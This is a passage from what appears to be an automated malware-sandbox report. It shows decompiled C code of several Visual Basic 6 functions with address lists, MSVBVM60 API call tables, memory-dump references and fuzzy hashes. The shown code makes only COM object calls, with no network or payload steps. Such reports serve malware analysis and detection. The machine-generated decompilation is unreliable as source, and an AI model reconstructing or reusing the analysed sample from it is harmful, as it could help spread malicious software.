				_v76 = _t95;
				_v32 = 0x80020004;
				_v40 = 0xa;
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t99 =  *((intOrPtr*)( *_v76 + 0x1cc))(_v76, 0x10, _t95,  *((intOrPtr*)( *((intOrPtr*)( *_v104)) + 0x35c))( *_v104));
				asm("fclex");
				_v80 = _t99;
				if(_v80 >= 0) {
					_v108 = _v108 & 0x00000000;
				} else {
					_push(0x1cc);
					_push(0x403e40);
					_push(_v76);
					_push(_v80);
					L00401756();
					_v108 = _t99;
				}
				L00401750();
				asm("wait");
				_push(0x420a0b);
				return _t99;
			}

0x00420797
0x004207a2
0x004207a3
0x004207aa
0x004207ad
0x004207b5
0x004207b8
0x004207c6
0x004207e0
0x004207c8
0x004207c8
0x004207cd
0x004207d2
0x004207d7
0x004207d7
0x004207fb
0x004207ff
0x00420804
0x00420807
0x0042080e
0x00420818
0x00420822
0x00420823
0x00420824
0x00420825
0x0042082e
0x00420834
0x00420836
0x0042083d
0x00420859
0x0042083f
0x0042083f
0x00420844
0x00420849
0x0042084c
0x0042084f
0x00420854
0x00420854
0x00420860
0x0042086c
0x00420886
0x0042086e
0x0042086e
0x00420873
0x00420878
0x0042087d
0x0042087d
0x00420897
0x004208a1
0x004208a5
0x004208aa
0x004208ad
0x004208b4
0x004208bb
0x004208c2
0x004208c9
0x004208d0
0x004208da
0x004208e4
0x004208e5
0x004208e6
0x004208e7
0x004208eb
0x004208f5
0x004208f6
0x004208f7
0x004208f8
0x004208fc
0x00420906
0x00420907
0x00420908
0x00420909
0x00420911
0x0042091c
0x00420922
0x00420924
0x0042092b
0x00420947
0x0042092d
0x0042092d
0x00420932
0x00420937
0x0042093a
0x0042093d
0x00420942
0x00420942
0x0042094e
0x0042095a
0x00420974
0x0042095c
0x0042095c
0x00420961
0x00420966
0x0042096b
0x0042096b
0x0042098f
0x00420993
0x00420998
0x0042099b
0x004209a2
0x004209ac
0x004209b6
0x004209b7
0x004209b8
0x004209b9
0x004209c2
0x004209c8
0x004209ca
0x004209d1
0x004209ed
0x004209d3
0x004209d3
0x004209d8
0x004209dd
0x004209e0
0x004209e3
0x004209e8
0x004209e8
0x004209f4
0x004209f9
0x004209fa
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 004207AD
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 004207D2
__vbaObjSet.MSVBVM60(?,00000000), ref: 004207FF
__vbaChkstk.MSVBVM60(?,00000000), ref: 00420818
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001CC), ref: 0042084F
__vbaFreeObj.MSVBVM60 ref: 00420860
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 00420878
__vbaObjSet.MSVBVM60(?,00000000), ref: 004208A5
__vbaChkstk.MSVBVM60(?,00000000), ref: 004208DA
__vbaChkstk.MSVBVM60(?,00000000), ref: 004208EB
__vbaChkstk.MSVBVM60(?,00000000), ref: 004208FC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001D0,?,?,00000000), ref: 0042093D
__vbaFreeObj.MSVBVM60(?,?,00000000), ref: 0042094E
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,00000000), ref: 00420966
__vbaObjSet.MSVBVM60(?,00000000,?,?,00000000), ref: 00420993
__vbaChkstk.MSVBVM60(?,00000000,?,?,00000000), ref: 004209AC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001CC,?,?,00000000), ref: 004209E3
__vbaFreeObj.MSVBVM60(?,?,00000000), ref: 004209F4

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$CheckFreeHresultNew2
String ID:
API String ID: 3189907775-0
Opcode ID: 03c04fa3a8adb5723686ed2ad876ee9864ac64cac0927aff510d048224d86fea
Instruction ID: 65490604196ab1a87a556a5b1a4ad4d66b3419285e4a005871877c65d2912a74
Opcode Fuzzy Hash: 03c04fa3a8adb5723686ed2ad876ee9864ac64cac0927aff510d048224d86fea
Instruction Fuzzy Hash: FD716774D00308DFDB05EFA1D946B9EBBB5AF09304F20442AF502BB2A1C7BA5945DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041EB68, Relevance: 25.7, APIs: 17, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041EB68(void* __ebx, void* __edi, void* __esi, char __fp0, intOrPtr* _a4, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				intOrPtr _v84;
				short _v88;
				char _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr* _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				intOrPtr* _v132;
				short _v136;
				char _v140;
				signed int _v144;
				char* _t86;
				signed int _t89;
				char* _t93;
				signed int _t97;
				char* _t101;
				signed int _t108;
				char* _t110;
				intOrPtr _t122;
				void* _t133;
				void* _t135;
				intOrPtr _t136;
				char _t144;

				_t144 = __fp0;
				_t136 = _t135 - 0xc;
				 *[fs:0x0] = _t136;
				L00401570();
				_v16 = _t136;
				_v12 = 0x401320;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x401576, _t133);
				L0040173E();
				if( *0x430010 != 0) {
					_v116 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v116 = 0x430010;
				}
				_t86 =  &_v32;
				L00401762();
				_v92 = _t86;
				_t89 =  *((intOrPtr*)( *_v92 + 0x1c4))(_v92, _t86,  *((intOrPtr*)( *((intOrPtr*)( *_v116)) + 0x484))( *_v116));
				asm("fclex");
				_v96 = _t89;
				if(_v96 >= 0) {
					_v120 = _v120 & 0x00000000;
				} else {
					_push(0x1c4);
					_push(0x403e40);
					_push(_v92);
					_push(_v96);
					L00401756();
					_v120 = _t89;
				}
				L00401750();
				if( *0x430010 != 0) {
					_v124 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v124 = 0x430010;
				}
				_t93 =  &_v32;
				L00401762();
				_v92 = _t93;
				_t97 =  *((intOrPtr*)( *_v92 + 0x128))(_v92,  &_v88, _t93,  *((intOrPtr*)( *((intOrPtr*)( *_v124)) + 0x3f8))( *_v124));
				asm("fclex");
				_v96 = _t97;
				if(_v96 >= 0) {
					_v128 = _v128 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x403e40);
					_push(_v92);
					_push(_v96);
					L00401756();
					_v128 = _t97;
				}
				if( *0x430010 != 0) {
					_v132 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v132 = 0x430010;
				}
				_t122 =  *((intOrPtr*)( *_v132));
				_t101 =  &_v36;
				L00401762();
				_v100 = _t101;
				_v76 = 0x80020004;
				_v84 = 0xa;
				_v60 = 0x80020004;
				_v68 = 0xa;
				_v44 = 0x80020004;
				_v52 = 0xa;
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v88;
				asm("fild dword [ebp-0x84]");
				_v140 = _t144;
				_v92 = _v140;
				_t108 =  *((intOrPtr*)( *_v100 + 0x1d0))(_v100, _t122, 0x10, 0x10, 0x10, _t101,  *((intOrPtr*)(_t122 + 0x350))( *_v132));
				asm("fclex");
				_v104 = _t108;
				if(_v104 >= 0) {
					_v144 = _v144 & 0x00000000;
				} else {
					_push(0x1d0);
					_push(0x403e40);
					_push(_v100);
					_push(_v104);
					L00401756();
					_v144 = _t108;
				}
				_push( &_v36);
				_t110 =  &_v32;
				_push(_t110);
				_push(2);
				L0040172C();
				asm("wait");
				_push(0x41edf5);
				L00401720();
				return _t110;
			}

0x0041eb68
0x0041eb6b
0x0041eb7a
0x0041eb84
0x0041eb8c
0x0041eb8f
0x0041eb96
0x0041eba5
0x0041ebae
0x0041ebba
0x0041ebd4
0x0041ebbc
0x0041ebbc
0x0041ebc1
0x0041ebc6
0x0041ebcb
0x0041ebcb
0x0041ebef
0x0041ebf3
0x0041ebf8
0x0041ec03
0x0041ec09
0x0041ec0b
0x0041ec12
0x0041ec2e
0x0041ec14
0x0041ec14
0x0041ec19
0x0041ec1e
0x0041ec21
0x0041ec24
0x0041ec29
0x0041ec29
0x0041ec35
0x0041ec41
0x0041ec5b
0x0041ec43
0x0041ec43
0x0041ec48
0x0041ec4d
0x0041ec52
0x0041ec52
0x0041ec76
0x0041ec7a
0x0041ec7f
0x0041ec8e
0x0041ec94
0x0041ec96
0x0041ec9d
0x0041ecb9
0x0041ec9f
0x0041ec9f
0x0041eca4
0x0041eca9
0x0041ecac
0x0041ecaf
0x0041ecb4
0x0041ecb4
0x0041ecc4
0x0041ecde
0x0041ecc6
0x0041ecc6
0x0041eccb
0x0041ecd0
0x0041ecd5
0x0041ecd5
0x0041ecef
0x0041ecf9
0x0041ecfd
0x0041ed02
0x0041ed05
0x0041ed0c
0x0041ed13
0x0041ed1a
0x0041ed21
0x0041ed28
0x0041ed32
0x0041ed3c
0x0041ed3d
0x0041ed3e
0x0041ed3f
0x0041ed43
0x0041ed4d
0x0041ed4e
0x0041ed4f
0x0041ed50
0x0041ed54
0x0041ed5e
0x0041ed5f
0x0041ed60
0x0041ed61
0x0041ed66
0x0041ed6c
0x0041ed72
0x0041ed7f
0x0041ed8a
0x0041ed90
0x0041ed92
0x0041ed99
0x0041edb8
0x0041ed9b
0x0041ed9b
0x0041eda0
0x0041eda5
0x0041eda8
0x0041edab
0x0041edb0
0x0041edb0
0x0041edc2
0x0041edc3
0x0041edc6
0x0041edc7
0x0041edc9
0x0041edd1
0x0041edd2
0x0041edef
0x0041edf4

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 0041EB84
__vbaStrCopy.MSVBVM60(?,?,?,?,00401576), ref: 0041EBAE
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 0041EBC6
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EBF3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001C4), ref: 0041EC24
__vbaFreeObj.MSVBVM60 ref: 0041EC35
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 0041EC4D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EC7A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000128), ref: 0041ECAF
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 0041ECD0
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041ECFD
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041ED32
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041ED43
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041ED54
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001D0,?,?,00000000), ref: 0041EDAB
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 0041EDC9
__vbaFreeStr.MSVBVM60(0041EDF5,?,?,00401576), ref: 0041EDEF

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$CheckFreeHresultNew2$CopyList
String ID:
API String ID: 1695551037-0
Opcode ID: 02c616bbac7c56e674b246030d39cfb2bcae7c7e8c5577cd51e2f992723f5fec
Instruction ID: b46f4c376ef636733afbfb68d60bcdc1b3b03024ded93a377dfc046ebcfa8f6f
Opcode Fuzzy Hash: 02c616bbac7c56e674b246030d39cfb2bcae7c7e8c5577cd51e2f992723f5fec
Instruction Fuzzy Hash: AC712578D00208EFCB15DFA1D949BDDBBB5BF08704F20446AE501BB2A1DBB95885DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00427B51, Relevance: 25.7, APIs: 17, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00427B51(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr __fp0, void* _a12) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				char _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _v96;
				signed int _v100;
				intOrPtr* _v104;
				signed int _v108;
				intOrPtr* _v116;
				signed int _v120;
				intOrPtr* _v124;
				short _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				char* _t81;
				signed int _t85;
				char* _t89;
				signed int _t96;
				char* _t102;
				signed int _t105;
				intOrPtr _t114;
				intOrPtr* _t131;
				intOrPtr _t139;

				_t139 = __fp0;
				_push(0x401576);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t131;
				_push(0x7c);
				L00401570();
				_v12 = _t131;
				_v8 = 0x401508;
				L0040173E();
				if( *0x430010 != 0) {
					_v116 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v116 = 0x430010;
				}
				_t81 =  &_v36;
				L00401762();
				_v96 = _t81;
				_t85 =  *((intOrPtr*)( *_v96 + 0x118))(_v96,  &_v92, _t81,  *((intOrPtr*)( *((intOrPtr*)( *_v116)) + 0x36c))( *_v116));
				asm("fclex");
				_v100 = _t85;
				if(_v100 >= 0) {
					_v120 = _v120 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x403e40);
					_push(_v96);
					_push(_v100);
					L00401756();
					_v120 = _t85;
				}
				if( *0x430010 != 0) {
					_v124 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v124 = 0x430010;
				}
				_t114 =  *((intOrPtr*)( *_v124));
				_t89 =  &_v40;
				L00401762();
				_v104 = _t89;
				_v80 = 0x80020004;
				_v88 = 0xa;
				_v64 = 0x80020004;
				_v72 = 0xa;
				_v48 = 0x80020004;
				_v56 = 0xa;
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v92;
				asm("fild dword [ebp-0x7c]");
				_v132 = _t139;
				 *_t131 = _v132;
				_t96 =  *((intOrPtr*)( *_v104 + 0x1d0))(_v104, _t114, 0x10, 0x10, 0x10, _t89,  *((intOrPtr*)(_t114 + 0x4b8))( *_v124));
				asm("fclex");
				_v108 = _t96;
				if(_v108 >= 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_push(0x1d0);
					_push(0x403e40);
					_push(_v104);
					_push(_v108);
					L00401756();
					_v136 = _t96;
				}
				_push( &_v40);
				_push( &_v36);
				_push(2);
				L0040172C();
				if( *0x430010 != 0) {
					_v140 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v140 = 0x430010;
				}
				_t102 =  &_v36;
				L00401762();
				_v96 = _t102;
				_t105 =  *((intOrPtr*)( *_v96 + 0x1c8))(_v96, _t102,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x43c))( *_v140));
				asm("fclex");
				_v100 = _t105;
				if(_v100 >= 0) {
					_v144 = _v144 & 0x00000000;
				} else {
					_push(0x1c8);
					_push(0x403e40);
					_push(_v96);
					_push(_v100);
					L00401756();
					_v144 = _t105;
				}
				L00401750();
				_v28 = 0x286757c0;
				_v24 = 0x5b07;
				asm("wait");
				_push(0x427ddf);
				L00401720();
				return _t105;
			}

0x00427b51
0x00427b56
0x00427b61
0x00427b62
0x00427b69
0x00427b6c
0x00427b74
0x00427b77
0x00427b84
0x00427b90
0x00427baa
0x00427b92
0x00427b92
0x00427b97
0x00427b9c
0x00427ba1
0x00427ba1
0x00427bc5
0x00427bc9
0x00427bce
0x00427bdd
0x00427be3
0x00427be5
0x00427bec
0x00427c08
0x00427bee
0x00427bee
0x00427bf3
0x00427bf8
0x00427bfb
0x00427bfe
0x00427c03
0x00427c03
0x00427c13
0x00427c2d
0x00427c15
0x00427c15
0x00427c1a
0x00427c1f
0x00427c24
0x00427c24
0x00427c3e
0x00427c48
0x00427c4c
0x00427c51
0x00427c54
0x00427c5b
0x00427c62
0x00427c69
0x00427c70
0x00427c77
0x00427c81
0x00427c8b
0x00427c8c
0x00427c8d
0x00427c8e
0x00427c92
0x00427c9c
0x00427c9d
0x00427c9e
0x00427c9f
0x00427ca3
0x00427cad
0x00427cae
0x00427caf
0x00427cb0
0x00427cb5
0x00427cb8
0x00427cbb
0x00427cc2
0x00427ccd
0x00427cd3
0x00427cd5
0x00427cdc
0x00427cfb
0x00427cde
0x00427cde
0x00427ce3
0x00427ce8
0x00427ceb
0x00427cee
0x00427cf3
0x00427cf3
0x00427d05
0x00427d09
0x00427d0a
0x00427d0c
0x00427d1b
0x00427d38
0x00427d1d
0x00427d1d
0x00427d22
0x00427d27
0x00427d2c
0x00427d2c
0x00427d5c
0x00427d60
0x00427d65
0x00427d70
0x00427d76
0x00427d78
0x00427d7f
0x00427d9e
0x00427d81
0x00427d81
0x00427d86
0x00427d8b
0x00427d8e
0x00427d91
0x00427d96
0x00427d96
0x00427da8
0x00427dad
0x00427db4
0x00427dbb
0x00427dbc
0x00427dd9
0x00427dde

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 00427B6C
__vbaStrCopy.MSVBVM60(?,?,?,?,00401576), ref: 00427B84
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 00427B9C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00427BC9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000118), ref: 00427BFE
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 00427C1F
__vbaObjSet.MSVBVM60(?,00000000), ref: 00427C4C
__vbaChkstk.MSVBVM60(?,00000000), ref: 00427C81
__vbaChkstk.MSVBVM60(?,00000000), ref: 00427C92
__vbaChkstk.MSVBVM60(?,00000000), ref: 00427CA3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001D0,?,?,00000000), ref: 00427CEE
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 00427D0C
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 00427D27
__vbaObjSet.MSVBVM60(?,00000000), ref: 00427D60
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001C8), ref: 00427D91
__vbaFreeObj.MSVBVM60 ref: 00427DA8
__vbaFreeStr.MSVBVM60(00427DDF), ref: 00427DD9

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$CheckFreeHresultNew2$CopyList
String ID:
API String ID: 1695551037-0
Opcode ID: 399e698733b793f180d2e4d93fb8a31a6fbc87c330f43e25add3dae9b6fe1f3f
Instruction ID: 88d2d392f68d6f6013bc8ec93ebbabd4b7b95c652e54054303a9a73a2489a650
Opcode Fuzzy Hash: 399e698733b793f180d2e4d93fb8a31a6fbc87c330f43e25add3dae9b6fe1f3f
Instruction Fuzzy Hash: A1716474D00318EFCB15DFA1D849B9EBBB5BF08304F20406AE116BB2A1CBB96945DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00427791, Relevance: 22.7, APIs: 15, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00427791(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v36;
				char _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				intOrPtr _v84;
				char _v92;
				intOrPtr* _v96;
				signed int _v100;
				intOrPtr* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				char* _t61;
				signed int _t67;
				char* _t71;
				signed int _t75;
				char* _t76;
				intOrPtr _t81;
				intOrPtr* _t100;
				intOrPtr _t105;

				_push(0x401576);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t100;
				_push(0x64);
				L00401570();
				_v12 = _t100;
				_v8 = 0x4014e8;
				if( *0x430010 != 0) {
					_v108 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v108 = 0x430010;
				}
				_t81 =  *((intOrPtr*)( *_v108));
				_t61 =  &_v28;
				L00401762();
				_v96 = _t61;
				_v84 = 0x80020004;
				_v92 = 0xa;
				_v68 = 0x80020004;
				_v76 = 0xa;
				_v52 = 0x80020004;
				_v60 = 0xa;
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t105 =  *0x4014e0;
				 *_t100 = _t105;
				_t67 =  *((intOrPtr*)( *_v96 + 0x1d0))(_v96, _t81, 0x10, 0x10, 0x10, _t61,  *((intOrPtr*)(_t81 + 0x4d4))( *_v108));
				asm("fclex");
				_v100 = _t67;
				if(_v100 >= 0) {
					_v112 = _v112 & 0x00000000;
				} else {
					_push(0x1d0);
					_push(0x403e40);
					_push(_v96);
					_push(_v100);
					L00401756();
					_v112 = _t67;
				}
				L00401750();
				if( *0x430010 != 0) {
					_v116 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v116 = 0x430010;
				}
				_t71 =  &_v28;
				L00401762();
				_v96 = _t71;
				_v52 = 0x80020004;
				_v60 = 0xa;
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t75 =  *((intOrPtr*)( *_v96 + 0x1cc))(_v96, 0x10, _t71,  *((intOrPtr*)( *((intOrPtr*)( *_v116)) + 0x428))( *_v116));
				asm("fclex");
				_v100 = _t75;
				if(_v100 >= 0) {
					_v120 = _v120 & 0x00000000;
				} else {
					_push(0x1cc);
					_push(0x403e40);
					_push(_v96);
					_push(_v100);
					L00401756();
					_v120 = _t75;
				}
				L00401750();
				_v36 = 0x80020004;
				_v44 = 0xa;
				_t76 =  &_v44;
				_push(_t76);
				L00401654();
				_v24 = _t105;
				L00401726();
				asm("wait");
				_push(0x42798e);
				return _t76;
			}

0x00427796
0x004277a1
0x004277a2
0x004277a9
0x004277ac
0x004277b4
0x004277b7
0x004277c5
0x004277df
0x004277c7
0x004277c7
0x004277cc
0x004277d1
0x004277d6
0x004277d6
0x004277f0
0x004277fa
0x004277fe
0x00427803
0x00427806
0x0042780d
0x00427814
0x0042781b
0x00427822
0x00427829
0x00427833
0x0042783d
0x0042783e
0x0042783f
0x00427840
0x00427844
0x0042784e
0x0042784f
0x00427850
0x00427851
0x00427855
0x0042785f
0x00427860
0x00427861
0x00427862
0x00427863
0x0042786a
0x00427875
0x0042787b
0x0042787d
0x00427884
0x004278a0
0x00427886
0x00427886
0x0042788b
0x00427890
0x00427893
0x00427896
0x0042789b
0x0042789b
0x004278a7
0x004278b3
0x004278cd
0x004278b5
0x004278b5
0x004278ba
0x004278bf
0x004278c4
0x004278c4
0x004278e8
0x004278ec
0x004278f1
0x004278f4
0x004278fb
0x00427905
0x0042790f
0x00427910
0x00427911
0x00427912
0x0042791b
0x00427921
0x00427923
0x0042792a
0x00427946
0x0042792c
0x0042792c
0x00427931
0x00427936
0x00427939
0x0042793c
0x00427941
0x00427941
0x0042794d
0x00427952
0x00427959
0x00427960
0x00427963
0x00427964
0x00427969
0x0042796f
0x00427974
0x00427975
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 004277AC
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 004277D1
__vbaObjSet.MSVBVM60(?,00000000), ref: 004277FE
__vbaChkstk.MSVBVM60(?,00000000), ref: 00427833
__vbaChkstk.MSVBVM60(?,00000000), ref: 00427844
__vbaChkstk.MSVBVM60(?,00000000), ref: 00427855
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001D0,?,?,00000000), ref: 00427896
__vbaFreeObj.MSVBVM60(?,?,00000000), ref: 004278A7
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,00000000), ref: 004278BF
__vbaObjSet.MSVBVM60(?,00000000,?,?,00000000), ref: 004278EC
__vbaChkstk.MSVBVM60(?,00000000,?,?,00000000), ref: 00427905
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001CC,?,?,00000000), ref: 0042793C
__vbaFreeObj.MSVBVM60(?,?,00000000), ref: 0042794D
#593.MSVBVM60(0000000A,?,?,00000000), ref: 00427964
__vbaFreeVar.MSVBVM60(0000000A,?,?,00000000), ref: 0042796F

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$Free$CheckHresultNew2$#593
String ID:
API String ID: 2355996457-0
Opcode ID: f38216dec70ffa5152d6d06d885b0204fef2c89c97ef549471ec1007db2e508c
Instruction ID: 7cdfb572f9432ad4521cde60bbd63cba107fadace2b6d011019bb6775a114624
Opcode Fuzzy Hash: f38216dec70ffa5152d6d06d885b0204fef2c89c97ef549471ec1007db2e508c
Instruction Fuzzy Hash: B55126B4D00318EFDB05EFA1D84AB9EBBB5BF09714F20052AF501BB2A1C7B95845CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041FA67, Relevance: 21.1, APIs: 14, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0041FA67(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				char _v28;
				intOrPtr _v36;
				intOrPtr _v44;
				void* _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v64;
				signed int _v68;
				intOrPtr* _v72;
				signed int _v76;
				intOrPtr* _v80;
				signed int _v84;
				char* _t68;
				signed int _t71;
				char* _t75;
				signed int _t79;
				char* _t83;
				signed int _t87;
				short _t88;
				intOrPtr _t109;

				_push(0x401576);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t109;
				_push(0x40);
				L00401570();
				_v12 = _t109;
				_v8 = 0x401370;
				if( *0x430010 != 0) {
					_v64 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v64 = 0x430010;
				}
				_t68 =  &_v28;
				L00401762();
				_v52 = _t68;
				_t71 =  *((intOrPtr*)( *_v52 + 0x1ac))(_v52, _t68,  *((intOrPtr*)( *((intOrPtr*)( *_v64)) + 0x304))( *_v64));
				asm("fclex");
				_v56 = _t71;
				if(_v56 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x1ac);
					_push(0x403e84);
					_push(_v52);
					_push(_v56);
					L00401756();
					_v68 = _t71;
				}
				L00401750();
				if( *0x430010 != 0) {
					_v72 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v72 = 0x430010;
				}
				_t75 =  &_v28;
				L00401762();
				_v52 = _t75;
				_v36 = 0x80020004;
				_v44 = 0xa;
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t79 =  *((intOrPtr*)( *_v52 + 0x1cc))(_v52, 0x10, _t75,  *((intOrPtr*)( *((intOrPtr*)( *_v72)) + 0x394))( *_v72));
				asm("fclex");
				_v56 = _t79;
				if(_v56 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x1cc);
					_push(0x403e40);
					_push(_v52);
					_push(_v56);
					L00401756();
					_v76 = _t79;
				}
				L00401750();
				if( *0x430010 != 0) {
					_v80 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v80 = 0x430010;
				}
				_t83 =  &_v28;
				L00401762();
				_v52 = _t83;
				_t87 =  *((intOrPtr*)( *_v52 + 0x128))(_v52,  &_v48, _t83,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x3d4))( *_v80));
				asm("fclex");
				_v56 = _t87;
				if(_v56 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x403e40);
					_push(_v52);
					_push(_v56);
					L00401756();
					_v84 = _t87;
				}
				_t88 = _v48;
				_v24 = _t88;
				L00401750();
				_push(0x41fc65);
				return _t88;
